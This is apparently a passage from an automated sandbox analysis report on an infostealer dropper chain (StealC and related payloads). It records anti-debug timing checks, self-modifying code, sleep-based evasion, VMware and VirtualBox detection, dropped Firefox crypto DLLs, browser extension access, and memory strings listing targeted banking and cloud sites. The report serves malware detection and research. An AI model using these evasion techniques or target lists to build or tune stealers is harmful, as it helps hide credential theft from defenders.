Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0480 second address: 50D04B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8A9C76F21Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D04B0 second address: 50D04B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D04B4 second address: 50D04BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5DE934 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5DEA1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 2CE934 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 2CEA1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Special instruction interceptor: First address: 29EB78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Special instruction interceptor: First address: F2DC68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Special instruction interceptor: First address: 4D2F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Special instruction interceptor: First address: 10FEC38 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Special instruction interceptor: First address: 6A1CEA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Special instruction interceptor: First address: 6A1BE8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Special instruction interceptor: First address: 86D559 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Special instruction interceptor: First address: 1172787 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Memory allocated: 1360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Memory allocated: DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Memory allocated: 1A790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Memory allocated: 3570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 49A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory allocated: 2A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory allocated: 1AC70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Memory allocated: 4A20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Memory allocated: 4C80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Memory allocated: 4A90000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05130375 rdtsc

0_2_05130375

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 888	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 947	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 643	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 982	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 915	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4450

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jwDqhXNxeUGDiYzIXhpX.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WGTxLaJUJMXdPsRkrFVC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

API coverage: 6.4 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6508	Thread sleep count: 888 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6508	Thread sleep time: -1776888s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6676	Thread sleep count: 947 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6676	Thread sleep time: -1894947s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6664	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7136	Thread sleep count: 301 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7136	Thread sleep time: -9030000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7164	Thread sleep count: 643 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7164	Thread sleep time: -1286643s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1264	Thread sleep count: 982 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1264	Thread sleep time: -1964982s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6408	Thread sleep count: 915 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6408	Thread sleep time: -1830915s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6756	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe TID: 4112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe TID: 3872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6820	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1276	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe TID: 5844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 3272	Thread sleep count: 150 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 3272	Thread sleep time: -300150s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 5148	Thread sleep count: 130 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 5148	Thread sleep time: -260130s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 2368	Thread sleep time: -44000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 712	Thread sleep count: 164 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 712	Thread sleep time: -328164s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 2424	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 5136	Thread sleep count: 153 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 5136	Thread sleep time: -306153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 1184	Thread sleep count: 183 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 1184	Thread sleep time: -366183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 904	Thread sleep count: 170 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 904	Thread sleep time: -340170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 6560	Thread sleep count: 188 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 6560	Thread sleep time: -376188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe TID: 2424	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe TID: 4668	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0025ADB8 FindFirstFileExW,	8_2_0025ADB8
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0025ADB8 FindFirstFileExW,	9_2_0025ADB8
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0041B6EA FindFirstFileExW,	10_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	14_2_00CAE430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CB4910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CA16D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	14_2_00CADA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	14_2_00CB3EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CAF6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	14_2_00CABE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB38B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	14_2_00CB38B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB4570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	14_2_00CB4570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	14_2_00CAED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	14_2_00CADE10

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CA1160 GetSystemInfo,ExitProcess,

14_2_00CA1160

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: InstallUtil.exe, 00000014.00000002.3013913479.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWc
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: axplong.exe, axplong.exe, 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmp, d0d468f327.exe, 00000024.00000002.3867006295.000000000042C000.00000040.00000001.01000000.00000020.sdmp, OFF011F112LUQGJPCDB24W.exe, 00000025.00000000.3006027881.00000000010B8000.00000080.00000001.01000000.00000021.sdmp, OFF011F112LUQGJPCDB24W.exe, 00000025.00000002.3120833121.00000000010B8000.00000040.00000001.01000000.00000021.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3146758221.0000000000826000.00000040.00000001.01000000.00000023.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: stealc_default2.exe, 0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareq
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: MSBuild.exe, 00000017.00000002.3193253820.00000000051F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000081E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpE
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
